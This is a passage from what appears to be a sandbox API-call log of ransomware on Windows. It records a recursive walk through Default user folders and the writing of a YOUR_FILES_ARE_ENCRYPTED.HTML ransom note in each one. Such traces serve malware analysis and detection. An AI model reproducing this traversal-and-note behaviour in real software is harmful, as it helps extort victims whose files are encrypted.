pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 76 [0110.688] GetProcessHeap () returned 0x600000 [0110.688] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.689] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0110.691] WriteFile (in: hFile=0x308, lpBuffer=0x3183de0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19eab8, lpOverlapped=0x0 | out: lpBuffer=0x3183de0*, lpNumberOfBytesWritten=0x19eab8*=0x3c00, lpOverlapped=0x0) returned 1 [0110.692] CloseHandle (hObject=0x308) returned 1 [0110.693] GetProcessHeap () returned 0x600000 [0110.693] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.693] GetProcessHeap () returned 0x600000 [0110.693] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6c47b8 | out: hHeap=0x600000) returned 1 [0110.694] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x620c18, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 0 [0110.694] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0110.694] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 66 [0110.694] GetProcessHeap () returned 0x600000 [0110.694] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.694] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\roaming\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0110.694] WriteFile (in: hFile=0x304, lpBuffer=0x3183de0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19edcc, lpOverlapped=0x0 | out: lpBuffer=0x3183de0*, lpNumberOfBytesWritten=0x19edcc*=0x3c00, lpOverlapped=0x0) returned 1 [0110.696] CloseHandle (hObject=0x304) returned 1 [0110.696] GetProcessHeap () returned 0x600000 [0110.696] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.696] GetProcessHeap () returned 0x600000 [0110.696] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0110.697] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620c3a, dwReserved1=0x620c10, cFileName="Roaming", cAlternateFileName="")) returned 0 [0110.697] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0110.699] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 58 [0110.699] GetProcessHeap () returned 0x600000 [0110.699] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.699] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0110.699] WriteFile (in: hFile=0x314, lpBuffer=0x3183de0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f0e0, lpOverlapped=0x0 | out: lpBuffer=0x3183de0*, lpNumberOfBytesWritten=0x19f0e0*=0x3c00, lpOverlapped=0x0) returned 1 [0110.700] CloseHandle (hObject=0x314) returned 1 [0110.701] GetProcessHeap () returned 0x600000 [0110.701] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.701] GetProcessHeap () returned 0x600000 [0110.701] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0110.701] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d54d8a8, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d54d8a8, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d54d8a8, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x19f200, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0110.701] StrStrIW (lpFirst="Application Data", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.701] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Application Data") returned 37 [0110.701] GetProcessHeap () returned 0x600000 [0110.701] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0110.702] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\Default\\Application Data" | out: lpString1="\\\\?\\C:\\Users\\Default\\Application Data") returned="\\\\?\\C:\\Users\\Default\\Application Data" [0110.702] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Application Data", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Application Data\\*") returned="\\\\?\\C:\\Users\\Default\\Application Data\\*" [0110.702] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Application Data\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620c3a, dwReserved1=0x620c10, cFileName="Roaming", cAlternateFileName="翿")) returned 0xffffffff [0110.702] GetProcessHeap () returned 0x600000 [0110.702] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0110.702] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d599f22, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d599f22, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d599f22, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x19f200, cFileName="Cookies", cAlternateFileName="")) returned 1 [0110.702] StrStrIW (lpFirst="Cookies", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.702] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Cookies") returned 28 [0110.702] GetProcessHeap () returned 0x600000 [0110.702] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0110.703] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\Default\\Cookies" | out: lpString1="\\\\?\\C:\\Users\\Default\\Cookies") returned="\\\\?\\C:\\Users\\Default\\Cookies" [0110.703] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Cookies", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Cookies\\*") returned="\\\\?\\C:\\Users\\Default\\Cookies\\*" [0110.703] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Cookies\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620c3a, dwReserved1=0x620c10, cFileName="Roaming", cAlternateFileName="翿")) returned 0xffffffff [0110.703] GetProcessHeap () returned 0x600000 [0110.703] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0110.703] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x19f200, cFileName="Desktop", cAlternateFileName="")) returned 1 [0110.703] StrStrIW (lpFirst="Desktop", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.703] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Desktop") returned 28 [0110.703] GetProcessHeap () returned 0x600000 [0110.703] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0110.703] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\Default\\Desktop" | out: lpString1="\\\\?\\C:\\Users\\Default\\Desktop") returned="\\\\?\\C:\\Users\\Default\\Desktop" [0110.703] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Desktop", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Desktop\\*") returned="\\\\?\\C:\\Users\\Default\\Desktop\\*" [0110.703] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Desktop\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620c3a, dwReserved1=0x620c10, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0110.703] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620c3a, dwReserved1=0x620c10, cFileName="..", cAlternateFileName="")) returned 1 [0110.703] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620c3a, dwReserved1=0x620c10, cFileName="..", cAlternateFileName="")) returned 0 [0110.703] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0110.703] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Desktop\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 58 [0110.703] GetProcessHeap () returned 0x600000 [0110.703] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.704] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Desktop\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\desktop\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0110.704] WriteFile (in: hFile=0x314, lpBuffer=0x3183de0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f0e0, lpOverlapped=0x0 | out: lpBuffer=0x3183de0*, lpNumberOfBytesWritten=0x19f0e0*=0x3c00, lpOverlapped=0x0) returned 1 [0110.705] CloseHandle (hObject=0x314) returned 1 [0110.706] GetProcessHeap () returned 0x600000 [0110.706] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.706] GetProcessHeap () returned 0x600000 [0110.706] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0110.706] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x5d527734, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d527734, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x19f200, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0110.706] StrStrIW (lpFirst="Documents", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.706] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Documents") returned 30 [0110.706] GetProcessHeap () returned 0x600000 [0110.706] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0110.707] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\Default\\Documents" | out: lpString1="\\\\?\\C:\\Users\\Default\\Documents") returned="\\\\?\\C:\\Users\\Default\\Documents" [0110.707] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Documents", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Documents\\*") returned="\\\\?\\C:\\Users\\Default\\Documents\\*" [0110.707] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Documents\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x5d527734, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d527734, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620c3a, dwReserved1=0x620c10, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0110.708] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x5d527734, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d527734, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620c3a, dwReserved1=0x620c10, cFileName="..", cAlternateFileName="")) returned 1 [0110.708] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d527734, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d527734, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d527734, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x620c10, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0110.708] StrStrIW (lpFirst="My Music", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.708] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Documents\\My Music") returned 39 [0110.708] GetProcessHeap () returned 0x600000 [0110.708] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6b47b0 [0110.709] lstrcpyW (in: lpString1=0x6b47b0, lpString2="\\\\?\\C:\\Users\\Default\\Documents\\My Music" | out: lpString1="\\\\?\\C:\\Users\\Default\\Documents\\My Music") returned="\\\\?\\C:\\Users\\Default\\Documents\\My Music" [0110.709] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Documents\\My Music", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Documents\\My Music\\*") returned="\\\\?\\C:\\Users\\Default\\Documents\\My Music\\*" [0110.709] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Documents\\My Music\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x74447960, ftCreationTime.dwLowDateTime=0x74459310, ftCreationTime.dwHighDateTime=0x76800a13, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x3e003e, ftLastWriteTime.dwLowDateTime=0x6238c8, ftLastWriteTime.dwHighDateTime=0x314, nFileSizeHigh=0x20002, nFileSizeLow=0x623906, dwReserved0=0x6238c8, dwReserved1=0x620c18, cFileName="@B㷘̗\x19", cAlternateFileName="翿")) returned 0xffffffff [0110.709] GetProcessHeap () returned 0x600000 [0110.709] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0110.710] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d527734, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d527734, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d527734, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x620c10, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0110.710] StrStrIW (lpFirst="My Pictures", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.710] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Documents\\My Pictures") returned 42 [0110.710] GetProcessHeap () returned 0x600000 [0110.710] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6b47b0 [0110.761] lstrcpyW (in: lpString1=0x6b47b0, lpString2="\\\\?\\C:\\Users\\Default\\Documents\\My Pictures" | out: lpString1="\\\\?\\C:\\Users\\Default\\Documents\\My Pictures") returned="\\\\?\\C:\\Users\\Default\\Documents\\My Pictures" [0110.761] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Documents\\My Pictures", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Documents\\My Pictures\\*") returned="\\\\?\\C:\\Users\\Default\\Documents\\My Pictures\\*" [0110.761] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Documents\\My Pictures\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x74447960, ftCreationTime.dwLowDateTime=0x74459310, ftCreationTime.dwHighDateTime=0x76800a13, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x3e003e, ftLastWriteTime.dwLowDateTime=0x6238c8, ftLastWriteTime.dwHighDateTime=0x314, nFileSizeHigh=0x20002, nFileSizeLow=0x623906, dwReserved0=0x6238c8, dwReserved1=0x620c18, cFileName="@B㷘̗\x19", cAlternateFileName="翿")) returned 0xffffffff [0110.761] GetProcessHeap () returned 0x600000 [0110.761] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0110.762] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d527734, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d527734, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d527734, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x620c10, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0110.762] StrStrIW (lpFirst="My Videos", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.762] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Documents\\My Videos") returned 40 [0110.762] GetProcessHeap () returned 0x600000 [0110.762] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6b47b0 [0110.763] lstrcpyW (in: lpString1=0x6b47b0, lpString2="\\\\?\\C:\\Users\\Default\\Documents\\My Videos" | out: lpString1="\\\\?\\C:\\Users\\Default\\Documents\\My Videos") returned="\\\\?\\C:\\Users\\Default\\Documents\\My Videos" [0110.763] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Documents\\My Videos", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Documents\\My Videos\\*") returned="\\\\?\\C:\\Users\\Default\\Documents\\My Videos\\*" [0110.763] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Documents\\My Videos\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x74447960, ftCreationTime.dwLowDateTime=0x74459310, ftCreationTime.dwHighDateTime=0x76800a13, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x3e003e, ftLastWriteTime.dwLowDateTime=0x6238c8, ftLastWriteTime.dwHighDateTime=0x314, nFileSizeHigh=0x20002, nFileSizeLow=0x623906, dwReserved0=0x6238c8, dwReserved1=0x620c18, cFileName="@B㷘̗\x19", cAlternateFileName="翿")) returned 0xffffffff [0110.763] GetProcessHeap () returned 0x600000 [0110.763] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0110.763] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d527734, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d527734, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d527734, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x620c10, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 0 [0110.763] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0110.764] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Documents\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 60 [0110.764] GetProcessHeap () returned 0x600000 [0110.764] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.764] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Documents\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\documents\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0110.765] WriteFile (in: hFile=0x314, lpBuffer=0x3183de0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f0e0, lpOverlapped=0x0 | out: lpBuffer=0x3183de0*, lpNumberOfBytesWritten=0x19f0e0*=0x3c00, lpOverlapped=0x0) returned 1 [0110.766] CloseHandle (hObject=0x314) returned 1 [0110.767] GetProcessHeap () returned 0x600000 [0110.767] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.767] GetProcessHeap () returned 0x600000 [0110.767] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0110.767] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x19f200, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0110.767] StrStrIW (lpFirst="Downloads", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.767] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Downloads") returned 30 [0110.767] GetProcessHeap () returned 0x600000 [0110.767] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0110.768] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\Default\\Downloads" | out: lpString1="\\\\?\\C:\\Users\\Default\\Downloads") returned="\\\\?\\C:\\Users\\Default\\Downloads" [0110.768] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Downloads", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Downloads\\*") 